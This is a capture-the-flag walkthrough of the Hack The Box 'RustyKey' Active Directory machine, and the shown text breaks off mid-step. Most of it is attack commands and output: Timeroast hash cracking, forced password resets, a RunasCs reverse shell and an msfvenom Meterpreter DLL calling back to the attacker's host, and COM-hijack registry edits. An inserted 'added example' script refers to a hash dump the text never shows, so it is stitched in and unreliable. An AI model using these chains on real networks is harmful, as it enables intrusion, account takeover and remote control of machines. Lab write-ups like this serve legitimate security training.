RustyKey - EnG

The document provides a detailed walkthrough of the RustyKey machine from Hack The Box Season 8, which is a high-difficulty Windows-based Active Directory challenge. It includes steps for initial enumeration, service scanning, and user enumeration, emphasizing the exploitation of identity-based access and misconfigurations. The full write-up will be publicly available after the conclusion of Season 8 to maintain transparency with HackTheBox policies.

Uploaded by yummy.sempai

Week 7 : [ENG] RustyKey - Hard

Release Date : 02:00 29/06/2025 (GMT +7)

Completed : 07:xx 30/06/2025 (GMT +7)

The full write-up will be made public after Season 8 ends to ensure transparency with HackTheBox policies. Please read carefully before commenting; I'm not responsible for any issues that arise.

Introduction
Welcome to this detailed walkthrough of the RustyKey machine from Hack The Box Season 8. This high-difficulty Windows-based Active Directory challenge immerses you in a realistic penetration testing scenario, emphasizing identity-based access and misconfiguration exploitation. We'll dive into enumerating critical attack surfaces, leveraging valid credentials, and navigating complex privilege escalation paths to achieve full system compromise.

Report Content Characteristics

I have explained in detail every task I performed in each step, accompanied by screenshots and the exploits used.
Initial Enumeration

Open 10.10.xx.xx:3268
Open 10.10.xx.xx:3269
Open 10.10.xx.xx:5985
Open 10.10.xx.xx:9389
Open 10.10.xx.xx:47001
Open 10.10.xx.xx:49664
Open 10.10.xx.xx:49665
Open 10.10.xx.xx:49667
Open 10.10.xx.xx:49666
Open 10.10.xx.xx:49669
Open 10.10.xx.xx:49671
Open 10.10.xx.xx:49670
Open 10.10.xx.xx:49672
Open 10.10.xx.xx:49673
Open 10.10.xx.xx:49676
Open 10.10.xx.xx:49692
Open 10.10.xx.xx:49739
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} -{{ipversion}} {{ip}} -A -Pn" on ip 10.10.xx.xx
Depending on the complexity of the script, results may take some time to appear.
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-01 00:59 +08
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 00:59
Completed NSE at 00:59, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 00:59
Completed NSE at 00:59, 0.00s elapsed

NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 00:59
Completed NSE at 00:59, 0.00s elapsed
Initiating SYN Stealth Scan at 00:59
Scanning rustykey.htb (10.10.xx.xx) [17 ports]
Discovered open port 3268/tcp on 10.10.xx.xx
Discovered open port 49671/tcp on 10.10.xx.xx
Discovered open port 49665/tcp on 10.10.xx.xx
Discovered open port 9389/tcp on 10.10.xx.xx
Discovered open port 49673/tcp on 10.10.xx.xx
Discovered open port 49739/tcp on 10.10.xx.xx
Discovered open port 5985/tcp on 10.10.xx.xx
Discovered open port 49670/tcp on 10.10.xx.xx
Discovered open port 49676/tcp on 10.10.xx.xx
Discovered open port 49667/tcp on 10.10.xx.xx
Discovered open port 49692/tcp on 10.10.xx.xx
Discovered open port 49666/tcp on 10.10.xx.xx
Discovered open port 49672/tcp on 10.10.xx.xx
Discovered open port 47001/tcp on 10.10.xx.xx
Discovered open port 49664/tcp on 10.10.xx.xx
Discovered open port 49669/tcp on 10.10.xx.xx
Discovered open port 3269/tcp on 10.10.xx.xx
Completed SYN Stealth Scan at 00:59, 0.54s elapsed (17 total ports)
Initiating Service scan at 00:59
Scanning 17 services on rustykey.htb (10.10.xx.xx)
Service scan Timing: About 41.18% done; ETC: 01:07 (0:04:24 remaining)
Completed Service scan at 01:02, 184.90s elapsed (17 services on 1 host)
Initiating OS detection (try #1) against rustykey.htb (10.10.xx.xx)
Retrying OS detection (try #2) against rustykey.htb (10.10.xx.xx)
Initiating Traceroute at 01:03
Completed Traceroute at 01:03, 1.69s elapsed
Initiating Parallel DNS resolution of 1 host. at 01:03
Completed Parallel DNS resolution of 1 host. at 01:03, 14.22s elapsed
DNS resolution of 1 IPs took 14.22s. Mode: Async [#: 1, OK: 0, NX: 0, DR: 1, SF: 0, TR: 3, CN: 0]
NSE: Script scanning 10.10.xx.xx.

NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 01:03
NSE Timing: About 99.11% done; ETC: 01:04 (0:00:00 remaining)
NSE Timing: About 99.28% done; ETC: 01:04 (0:00:00 remaining)
NSE Timing: About 99.58% done; ETC: 01:05 (0:00:00 remaining)
NSE Timing: About 99.62% done; ETC: 01:05 (0:00:00 remaining)
NSE Timing: About 99.92% done; ETC: 01:06 (0:00:00 remaining)
Completed NSE at 01:06, 151.72s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 01:06
Completed NSE at 01:06, 9.27s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 01:06
Completed NSE at 01:06, 0.00s elapsed
Nmap scan report for rustykey.htb (10.10.xx.xx)
Host is up, received user-set (0.33s latency).
Scanned at 2025-07-01 00:59:51 +08 for 391s

PORT      STATE SERVICE    REASON          VERSION
3268/tcp  open  ldap       syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: rustykey.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped syn-ack ttl 127
5985/tcp  open  http       syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf     syn-ack ttl 127 .NET Message Framing
47001/tcp open  http       syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open  unknown    syn-ack ttl 127
49665/tcp open  unknown    syn-ack ttl 127
49666/tcp open  unknown    syn-ack ttl 127
49667/tcp open  unknown    syn-ack ttl 127
49669/tcp open  unknown    syn-ack ttl 127
49670/tcp open  ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49671/tcp open  unknown    syn-ack ttl 127
49672/tcp open  unknown    syn-ack ttl 127
49673/tcp open  unknown    syn-ack ttl 127
49676/tcp open  unknown    syn-ack ttl 127
49692/tcp open  unknown    syn-ack ttl 127
49739/tcp open  unknown    syn-ack ttl 127
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
Aggressive OS guesses: Microsoft Windows Server 2016 (95%), Microsoft Windows Server 2019 (95%), Microsoft Windows Server 2012 (95%), Windows Server 2019 (95%), Microsoft Windows Server 2022 (95%), Microsoft Windows Vista SP1 (95%), Microsoft Windows Server 2012 or 2012 R2 (93%), Microsoft Windows 10 (92%), Microsoft Windows 10 1703 or Windows 11 21H2 (92%), Microsoft Windows 10 1709 - 21H2 (92%)
No exact OS matches for host (test conditions non-ideal).

Network Distance: 2 hops


TCP Sequence Prediction: Difficulty=248 (Good luck!)
IP ID Sequence Generation: Randomized
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

TRACEROUTE (using port 3268/tcp)


HOP RTT ADDRESS
1 671.31 ms 10.10.16.1
2 671.62 ms rustykey.htb (10.10.xx.xx)

NSE: Script Post-scanning.


NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 01:06
Completed NSE at 01:06, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 01:06
Completed NSE at 01:06, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 01:06
Completed NSE at 01:06, 0.00s elapsed
Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 392.16 seconds
Raw packets sent: 179 (13.574KB) | Rcvd: 1380 (59.698KB)

10.10.xx.xx rustykey.htb dc.rustykey.htb

📢 KRB5 configuration

[libdefaults]
default_realm = RUSTYKEY.HTB
kdc_timesync = 1
ccache_type = 4
forwardable = true
proxiable = true
fcc-mit-ticketflags = true
dns_canonicalize_hostname = false
dns_lookup_realm = false
dns_lookup_kdc = true
k5login_authoritative = false
[realms]
RUSTYKEY.HTB = {
kdc = rustykey.htb
admin_server = rustykey.htb
default_admin = rustykey.htb
}
[domain_realm]
.rustykey.htb = RUSTYKEY.HTB

1. Users Enumeration

┌──(root㉿kali)-[/home/kali/Desktop/RustyKey]
└─# ldapsearch -x -H ldap://10.10.xx.xx -D '[email protected]' -w '8#t5HE8L!W3A' -b 'dc=rustykey,dc=htb' "(objectClass=user)" userPrincipalName
# extended LDIF
#
# LDAPv3
# base <dc=rustykey,dc=htb> with scope subtree
# filter: (objectClass=user)
# requesting: userPrincipalName

#

# Administrator, Users, rustykey.htb
dn: CN=Administrator,CN=Users,DC=rustykey,DC=htb

# Guest, Users, rustykey.htb
dn: CN=Guest,CN=Users,DC=rustykey,DC=htb

# DC, Domain Controllers, rustykey.htb
dn: CN=DC,OU=Domain Controllers,DC=rustykey,DC=htb

# krbtgt, Users, rustykey.htb
dn: CN=krbtgt,CN=Users,DC=rustykey,DC=htb

# Support-Computer1, Computers, Support, rustykey.htb
dn: CN=Support-Computer1,OU=Computers,OU=Support,DC=rustykey,DC=htb

# Support-Computer2, Computers, Support, rustykey.htb
dn: CN=Support-Computer2,OU=Computers,OU=Support,DC=rustykey,DC=htb

# Support-Computer3, Computers, Support, rustykey.htb
dn: CN=Support-Computer3,OU=Computers,OU=Support,DC=rustykey,DC=htb

# Support-Computer4, Computers, Support, rustykey.htb
dn: CN=Support-Computer4,OU=Computers,OU=Support,DC=rustykey,DC=htb

# Support-Computer5, Computers, Support, rustykey.htb
dn: CN=Support-Computer5,OU=Computers,OU=Support,DC=rustykey,DC=htb

# Finance-Computer1, Computers, Finance, rustykey.htb
dn: CN=Finance-Computer1,OU=Computers,OU=Finance,DC=rustykey,DC=htb

# Finance-Computer2, Computers, Finance, rustykey.htb
dn: CN=Finance-Computer2,OU=Computers,OU=Finance,DC=rustykey,DC=htb

# Finance-Computer3, Computers, Finance, rustykey.htb
dn: CN=Finance-Computer3,OU=Computers,OU=Finance,DC=rustykey,DC=htb

# Finance-Computer4, Computers, Finance, rustykey.htb
dn: CN=Finance-Computer4,OU=Computers,OU=Finance,DC=rustykey,DC=htb

# Finance-Computer5, Computers, Finance, rustykey.htb
dn: CN=Finance-Computer5,OU=Computers,OU=Finance,DC=rustykey,DC=htb

# IT-Computer1, Computers, IT, rustykey.htb
dn: CN=IT-Computer1,OU=Computers,OU=IT,DC=rustykey,DC=htb

# IT-Computer2, Computers, IT, rustykey.htb
dn: CN=IT-Computer2,OU=Computers,OU=IT,DC=rustykey,DC=htb

# IT-Computer3, Computers, IT, rustykey.htb
dn: CN=IT-Computer3,OU=Computers,OU=IT,DC=rustykey,DC=htb

# IT-Computer4, Computers, IT, rustykey.htb
dn: CN=IT-Computer4,OU=Computers,OU=IT,DC=rustykey,DC=htb

# IT-Computer5, Computers, IT, rustykey.htb
dn: CN=IT-Computer5,OU=Computers,OU=IT,DC=rustykey,DC=htb

# rr.parker, Users, rustykey.htb
dn: CN=rr.parker,CN=Users,DC=rustykey,DC=htb
userPrincipalName: [email protected]

# mm.turner, Users, rustykey.htb
dn: CN=mm.turner,CN=Users,DC=rustykey,DC=htb
userPrincipalName: [email protected]

# bb.morgan, Users, IT, rustykey.htb
dn: CN=bb.morgan,OU=Users,OU=IT,DC=rustykey,DC=htb
userPrincipalName: [email protected]

# gg.anderson, Users, IT, rustykey.htb
dn: CN=gg.anderson,OU=Users,OU=IT,DC=rustykey,DC=htb
userPrincipalName: [email protected]

# dd.ali, Users, Finance, rustykey.htb
dn: CN=dd.ali,OU=Users,OU=Finance,DC=rustykey,DC=htb
userPrincipalName: [email protected]

# ee.reed, Users, Support, rustykey.htb
dn: CN=ee.reed,OU=Users,OU=Support,DC=rustykey,DC=htb
userPrincipalName: [email protected]

# nn.marcos, Users, rustykey.htb
dn: CN=nn.marcos,CN=Users,DC=rustykey,DC=htb
userPrincipalName: [email protected]

# backupadmin, Users, rustykey.htb
dn: CN=backupadmin,CN=Users,DC=rustykey,DC=htb
userPrincipalName: [email protected]

# search reference
ref: ldap://ForestDnsZones.rustykey.htb/DC=ForestDnsZones,DC=rustykey,DC=htb

# search reference
ref: ldap://DomainDnsZones.rustykey.htb/DC=DomainDnsZones,DC=rustykey,DC=htb

# search reference
ref: ldap://rustykey.htb/CN=Configuration,DC=rustykey,DC=htb

# search result
search: 2
result: 0 Success

# numResponses: 31
# numEntries: 27
# numReferences: 3

2. Bloodhound Enumeration


┌──(root㉿kali)-[/home/kali/Desktop/RustyKey]
└─# impacket-getTGT -dc-ip 10.10.xx.xx rustykey.htb/rr.parker:'8#t5HE8L!W3A'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Saving ticket in rr.parker.ccache

┌──(root㉿kali)-[/home/kali/Desktop/RustyKey]
└─# export KRB5CCNAME=rr.parker.ccache

┌──(root㉿kali)-[/home/kali/Desktop/RustyKey]
└─# klist
Ticket cache: FILE:rr.parker.ccache
Default principal: [email protected]

Valid starting       Expires              Service principal
06/30/2025 03:35:01  06/30/2025 13:35:01  krbtgt/RUSTYKEY.HTB@RUSTYKEY.HTB
	renew until 07/01/2025 03:34:29

┌──(root㉿kali)-[/home/kali/Desktop/RustyKey]
└─# bloodhound-python -u 'rr.parker' -p '8#t5HEL!W3A' -c All -d rustykey.htb -ns 10.10.xx.xx --zip -k
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: rustykey.htb
INFO: Using TGT from cache
INFO: Found TGT with correct principal in ccache file.
INFO: Connecting to LDAP server: dc.rustykey.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 16 computers
INFO: Connecting to LDAP server: dc.rustykey.htb
INFO: Found 12 users
INFO: Found 58 groups
INFO: Found 2 gpos
INFO: Found 10 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer: dc.rustykey.htb
INFO: Done in 00M 26S
INFO: Compressing output into 20250630033519_bloodhound.zip

The computer account IT_COMPUTER3 can add itself to the HELPDESK group.

The HELPDESK group can change the password of the following four users:

bb.morgan
gg.anderson
dd.ali
ee.reed

MM.TURNER has AddAllowedToAct rights on DC.RUSTYKEY.HTB.

These 3 users can connect via Evil-WinRM:

bb.morgan
gg.anderson
ee.reed

3. Timeroasting Of IT-COMPUTER3$ With Timeroast

Timeroasting takes advantage of Windows' NTP authentication mechanism, allowing unauthenticated attackers to effectively request a password hash of any computer or trust account by sending an NTP request with that account's RID. This is not a problem when computer accounts are properly generated, but if a non-standard or legacy default password is set this tool allows you to brute-force those offline.

https://github.com/SecuraBV/Timeroast

First, clone Timeroast from the link above and edit timecrack.py.


┌──(root kali)-[/home/kali/Desktop/RustyKey]
└─# git clone https://github.com/SecuraBV/Timeroast.git
Cloning into 'Timeroast'...
remote: Enumerating objects: 91, done.
remote: Counting objects: 100% (91/91), done.
remote: Compressing objects: 100% (54/54), done.
remote: Total 91 (delta 46), reused 73 (delta 35), pack-reused 0 (from 0)
Receiving objects: 100% (91/91), 246.55 KiB | 1.10 MiB/s, done.
Resolving deltas: 100% (46/46), done.

┌──(root ㉿kali)-[/home/kali/Desktop/RustyKey]
└─# ll
total 220
-rw-rw-r-- 1 root root 209916 Jun 30 03:35 20250630033519_bloodhound.zip
-rw-rw-r-- 1 root root 1976 Jun 30 03:06 internal.pdf
-rw-rw-r-- 1 root root 1375 Jun 30 03:34 rr.parker.ccache
drwxrwxr-x 4 root root 4096 Jun 30 03:37 Timeroast


┌──(root㉿kali)-[/home/kali/Desktop/RustyKey]
└─# ls Timeroast
extra-scripts  LICENSE  README.md  timeroast.ps1  timeroast.py


┌──(root kali)-[/home/kali/Desktop/RustyKey]
└─# ls Timeroast/extra-scripts
kirbi_to_hashcat.py md4.py timecrack.py

┌──(root kali)-[/home/kali/Desktop/RustyKey]
└─# nano Timeroast/extra-scripts/timecrack.py

📢 The script timecrack.py after editing looks like this:

#!/usr/bin/env python3
"""Perform a simple dictionary attack against the output of timeroast.py. Necessary because
the NTP 'hash' format unfortunately does not fit into Hashcat or John right now.
Not even remotely optimized, but still useful for cracking legacy default passwords (where the
password is the computer name) or specific default passwords that are popular in an organisation.
"""
from binascii import hexlify, unhexlify
from argparse import ArgumentParser, FileType, RawDescriptionHelpFormatter
from typing import TextIO, Generator, Tuple
import hashlib, sys, re

# One line of timeroast.py output: <RID>:$sntp-ms$<MD5 authenticator>$<48-byte NTP packet as salt>
HASH_FORMAT = r'^(?P<rid>\d+):\$sntp-ms\$(?P<hashval>[0-9a-f]{32})\$(?P<salt>[0-9a-f]{96})$'

def md4(data: bytes) -> bytes:
    try:
        return hashlib.new('md4', data).digest()
    except ValueError:
        from md4 import MD4  # Fallback to pure Python if OpenSSL has no MD4
        return MD4(data).bytes()

def compute_hash(password: str, salt: bytes) -> bytes:
    """Compute a legacy NTP authenticator 'hash'."""
    return hashlib.md5(md4(password.encode('utf-16le')) + salt).digest()

def try_crack(hashfile: TextIO, dictfile: TextIO) -> Generator[Tuple[int, str], None, None]:
    hashes = []
    for line in hashfile:
        line = line.strip()
        if line:
            m = re.match(HASH_FORMAT, line)
            if not m:
                print(f'ERROR: invalid hash format: {line}', file=sys.stderr)
                sys.exit(1)
            rid, hashval, salt = m.group('rid', 'hashval', 'salt')
            hashes.append((int(rid), unhexlify(hashval), unhexlify(salt)))

    for password in dictfile:
        password = password.strip()
        for rid, hashval, salt in hashes:
            if compute_hash(password, salt) == hashval:
                yield rid, password

def main():
    argparser = ArgumentParser(
        formatter_class=RawDescriptionHelpFormatter,
        description="""Perform a simple dictionary attack against the output of timeroast.py.
Not even remotely optimized, but still useful for cracking legacy default
passwords (where the password is the computer name) or specific default
passwords that are popular in an organisation.
"""
    )
    argparser.add_argument('hashes', type=FileType('r'), help='Output of timeroast.py')
    argparser.add_argument('dictionary', type=lambda f: open(f, encoding='latin-1'),
                           help='Line-delimited password dictionary (e.g. rockyou.txt)')
    args = argparser.parse_args()

    crackcount = 0
    for rid, password in try_crack(args.hashes, args.dictionary):
        print(f'[+] Cracked RID {rid} password: {password}')
        crackcount += 1
    print(f'\n{crackcount} passwords recovered.')

if __name__ == '__main__':
    main()

Use these commands to collect the hashes and crack them:


┌──(root kali)-[/home/kali/Desktop/RustyKey]
└─# python3 Timeroast/timeroast.py 10.10.xx.xx -o rustykey.hashes


┌──(root㉿kali)-[/home/kali/Desktop/RustyKey]
└─# python3 Timeroast/extra-scripts/timecrack.py rustykey.hashes /usr/share/wordlists/rockyou.txt
[+] Cracked RID 1125 password: Rusty88!

1 passwords recovered.

In Bloodhound we see that RID 1125 belongs to IT_COMPUTER3 !!!
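To see what a timeroast line actually contains, here is an added example (not from the write-up or the Timeroast project) that parses the RID 1125 line from rustykey.hashes: the 96 hex characters after the authenticator are the raw 48-byte NTP reply from the DC, and the authenticator is MD5(MD4(password as UTF-16LE) || that packet), so nothing in the line is secret except the password.

```python
#!/usr/bin/env python3
"""Decode one line of timeroast.py output (added example, not part of the
write-up or of the Timeroast project).

Line layout:  <RID>:$sntp-ms$<32 hex authenticator>$<96 hex salt>
The 'salt' is the 48-byte NTP reply packet the DC sent back; the authenticator
is MD5(MD4(password as UTF-16LE) || packet). Because the whole packet is public,
anyone holding the line can test candidate passwords offline, which is why a
default or guessable computer-account password is the real weakness here.
"""
import re
import struct
from datetime import datetime, timedelta, timezone

HASH_FORMAT = re.compile(
    r'^(?P<rid>\d+):\$sntp-ms\$(?P<hashval>[0-9a-f]{32})\$(?P<salt>[0-9a-f]{96})$')
NTP_EPOCH = datetime(1900, 1, 1, tzinfo=timezone.utc)

# RID 1125 (IT-COMPUTER3$) line as printed in the write-up's rustykey.hashes dump.
SAMPLE_LINE = ("1125:$sntp-ms$6ed8ea2bc7d6b059efe9bfd731e359bb$"
               "1c0111e900000000000a01694c4f434cec0c132e2da76386"
               "e1b8428bffbfcd0aec0c150b59af7b83ec0c150b59af9ebe")


def ntp_ts(raw: bytes) -> datetime:
    """64-bit NTP timestamp (32.32 fixed point, seconds since 1900) -> aware UTC datetime."""
    secs, frac = struct.unpack(">II", raw)
    return NTP_EPOCH + timedelta(seconds=secs + frac / 2 ** 32)


def parse_line(line: str) -> dict:
    """Split a timeroast line and decode the NTP header fields of its salt packet."""
    m = HASH_FORMAT.match(line.strip())
    if not m:
        raise ValueError(f"not a timeroast line: {line!r}")
    pkt = bytes.fromhex(m["salt"])          # exactly 48 bytes, guaranteed by the regex
    first = pkt[0]                          # LI (2 bits) | VN (3 bits) | Mode (3 bits)
    return {
        "rid": int(m["rid"]),
        "authenticator": m["hashval"],
        "leap": first >> 6,
        "version": (first >> 3) & 7,
        "mode": first & 7,                  # 4 = server reply
        "stratum": pkt[1],
        "poll": pkt[2],
        "precision": struct.unpack(">b", pkt[3:4])[0],   # log2 seconds, signed
        "root_delay": struct.unpack(">I", pkt[4:8])[0] / 2 ** 16,
        "root_dispersion": struct.unpack(">I", pkt[8:12])[0] / 2 ** 16,
        "ref_id": pkt[12:16],               # b'LOCL' = DC synced to its own local clock
        "reference": ntp_ts(pkt[16:24]),
        "origin": ntp_ts(pkt[24:32]),       # echo of the client's transmit timestamp
        "receive": ntp_ts(pkt[32:40]),
        "transmit": ntp_ts(pkt[40:48]),     # when the DC answered the roast request
    }


if __name__ == "__main__":
    for key, value in parse_line(SAMPLE_LINE).items():
        print(f"{key:16} {value}")
```

The transmit timestamp decodes to the DC's clock at the moment it answered, which lines up with the BloodHound run in this write-up, and the reference ID LOCL shows the DC is its own time source.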

Running cat rustykey.hashes shows the collected hashes, including the one for IT_COMPUTER3, so we do not need an alternative such as an MITM via NetExec or similar.


┌──(root kali)-[/home/kali/Desktop/RustyKey]
└─# cat rustykey.hashes

4. Exploit Chain


┌──(root㉿kali)-[/home/kali/Desktop/RustyKey]
└─# ntpdate -u 10.10.xx.xx
2025-07-01 00:13:07.685429 (+0800) +6.425222 +/- 0.055239 10.10.xx.xx s1 no-leap
CLOCK: time stepped by 6.425222

┌──(root㉿kali)-[/home/kali/Desktop/RustyKey]
└─# bloodyAD --host dc.rustykey.htb -d rustykey.htb -u 'IT-COMPUTER3$' -p 'Rusty88!' -k add groupMember HELPDESK 'IT-COMPUTER3$'
[+] IT-COMPUTER3$ added to HELPDESK

┌──(root㉿kali)-[/home/kali/Desktop/RustyKey]
└─# bloodyAD --host dc.rustykey.htb -d rustykey.htb -u 'IT-COMPUTER3$' -p 'Rusty88!' -k set password BB.MORGAN 'P@ssword123'
[+] Password changed successfully!

┌──(root㉿kali)-[/home/kali/Desktop/RustyKey]
└─# bloodyAD --host dc.rustykey.htb -d rustykey.htb -u 'IT-COMPUTER3$' -p 'Rusty88!' -k remove groupMember 'PROTECTED OBJECTS' 'IT'
[-] IT removed from PROTECTED OBJECTS

┌──(root㉿kali)-[/home/kali/Desktop/RustyKey]
└─# impacket-getTGT 'RUSTYKEY.HTB/BB.MORGAN:P@ssword123'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Saving ticket in BB.MORGAN.ccache

┌──(root㉿kali)-[/home/kali/Desktop/RustyKey]
└─# export KRB5CCNAME=BB.MORGAN.ccache

┌──(root㉿kali)-[/home/kali/Desktop/RustyKey]
└─# evil-winrm -i dc.rustykey.htb -r RUSTYKEY.HTB

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint


*Evil-WinRM* PS C:\Users\bb.morgan\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\bb.morgan\Desktop> dir

Directory: C:\Users\bb.morgan\Desktop

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----          6/4/2025   9:15 AM           1976 internal.pdf
-ar---         6/29/2025  12:32 PM             34 user.txt

*Evil-WinRM* PS C:\Users\bb.morgan\Desktop>

5. Initial From PDF File


As bb.morgan, we find a PDF file in the Desktop directory.

*Evil-WinRM* PS C:\Users\bb.morgan\Desktop> download internal.pdf

Info: Downloading C:\Users\bb.morgan\Desktop\internal.pdf to internal.pdf

Info: Download successful!

The document describes that the Support group temporarily receives extended rights such as access to registry keys, etc. (it is not entirely clear what is meant).

First, follow these steps in order:

Remove SUPPORT from Protected Objects (ee.reed is a member of the SUPPORT group).

Set a new password for the user ee.reed.

Open a WinRM session as ee.reed.


┌──(root㉿kali)-[/home/kali/Desktop/RustyKey]
└─# bloodyAD --kerberos --dc-ip 10.10.xx.xx --host dc.rustykey.htb -d rustykey.htb -u IT-COMPUTER3$ -p 'Rusty88!' remove groupMember "CN=PROTECTED OBJECTS,CN=USERS,DC=RUSTYKEY,DC=HTB" "SUPPORT"
[-] SUPPORT removed from CN=PROTECTED OBJECTS,CN=USERS,DC=RUSTYKEY,DC=HTB

┌──(root㉿kali)-[/home/kali/Desktop/RustyKey]
└─# bloodyAD --kerberos --host dc.rustykey.htb -d rustykey.htb -u 'IT-COMPUTER3$' -p 'Rusty88!' set password ee.reed 'P@ssword123'
[+] Password changed successfully!

┌──(root ㉿kali)-[/home/kali/Desktop/RustyKey]
└─# evil-winrm -i dc.rustykey.htb -u ee.reed -r rustykey.htb

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Warning: User is not needed for Kerberos auth. Ticket will be used

Info: Establishing connection to remote endpoint

Error: An error of type GSSAPI::GssApiError happened, message is gss_init_sec_context did not return GSS_S_COMPLETE: No credentials were supplied, or the credentials were unavailable or inaccessible
No Kerberos credentials available (default cache: IT-COMPUTER3$.ccache)

Error: Exiting with code 1

🚨 Since we cannot get an Evil-WinRM shell as EE.REED, we have to use RunasCs.exe via our existing shell as BB.MORGAN.

6. Access Into ee.reed With RunasCs


We create the directory for our tools on the target system and upload RunasCs.exe to the target. After that, we use RunasCs for a reverse shell with the privileges of ee.reed.

*Evil-WinRM* PS C:\Users\bb.morgan\Desktop> cd /
*Evil-WinRM* PS C:\> mkdir Tools

Directory: C:\

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----         6/30/2025  10:06 AM                Tools

*Evil-WinRM* PS C:\> cd Tools


*Evil-WinRM* PS C:\Tools> upload RunasCs.exe

Info: Uploading /home/kali/Desktop/RustyKey/RunasCs.exe to C:\Tools\RunasCs.exe

Data: 68948 bytes of 68948 bytes copied

Info: Upload successful!


*Evil-WinRM* PS C:\Tools> .\RunasCs.exe ee.reed P@ssword123 cmd.exe -r 10.10.16.xx:4444
[*] Warning: User profile directory for user ee.reed does not exists. Use --force-profile if you want to force the creation.
[*] Warning: The logon for user 'ee.reed' is limited. Use the flag combination --bypass-uac and --logon-type '8' to obtain a more privileged token.

[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-238dff$\Default
[+] Async process 'C:\Windows\system32\cmd.exe' with pid 5364 created in background.

We now have a shell as user ee.reed

┌──(root kali)-[/home/kali/Desktop/RustyKey]
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.16.xx] from (UNKNOWN) [10.10.xx.xx] 56558
Microsoft Windows [Version 10.0.17763.7434]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
rustykey\ee.reed

C:\Windows\system32>cd C:/Tools
cd C:/Tools

7. Get Into mm.turner Session


We set up a DLL-based Meterpreter backdoor via a COM hijacking vulnerability

┌──(root ㉿kali)-[/home/kali/Desktop/RustyKey]
└─# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.16.xx LPORT=4444 -f dll -o rev.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of dll file: 9216 bytes
Saved as: rev.dll

Upload DLL (use bb.morgan evil-winrm shell)

*Evil-WinRM* PS C:\Tools> upload rev.dll

Info: Uploading /home/kali/Desktop/RustyKey/rev.dll to C:\Tools\rev.dll

Data: 12288 bytes of 12288 bytes copied

Info: Upload successful!

Prepare Handler in Metasploit

┌──(root ㉿kali)-[/home/kali/Desktop/RustyKey]
└─# msfconsole -q -x "use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set LHOST 10.10.16.xx; set LPORT 4444; exploit"

Perform registry manipulation

C:\Tools>dir
dir
Volume in drive C has no label.
Volume Serial Number is 00BA-0DBE

Directory of C:\Tools

06/30/2025  10:13 AM    <DIR>          .
06/30/2025  10:13 AM    <DIR>          ..
06/30/2025  10:13 AM             9,216 rev.dll
06/30/2025  10:09 AM            51,712 RunasCs.exe
               2 File(s)         60,928 bytes
               2 Dir(s)   2,940,559,360 bytes free

C:\Tools>reg add "HKLM\Software\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32" /ve /d "C:\Tools\rev.dll" /f
reg add "HKLM\Software\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32" /ve /d "C:\Tools\rev.dll" /f
The operation completed successfully.

After a few seconds we get a reverse shell (we have to be quick, the connection drops very quickly) and set up delegation for our machine account; remember to switch from cmd to a PowerShell session.

┌──(root ㉿kali)-[/home/kali/Desktop/RustyKey]
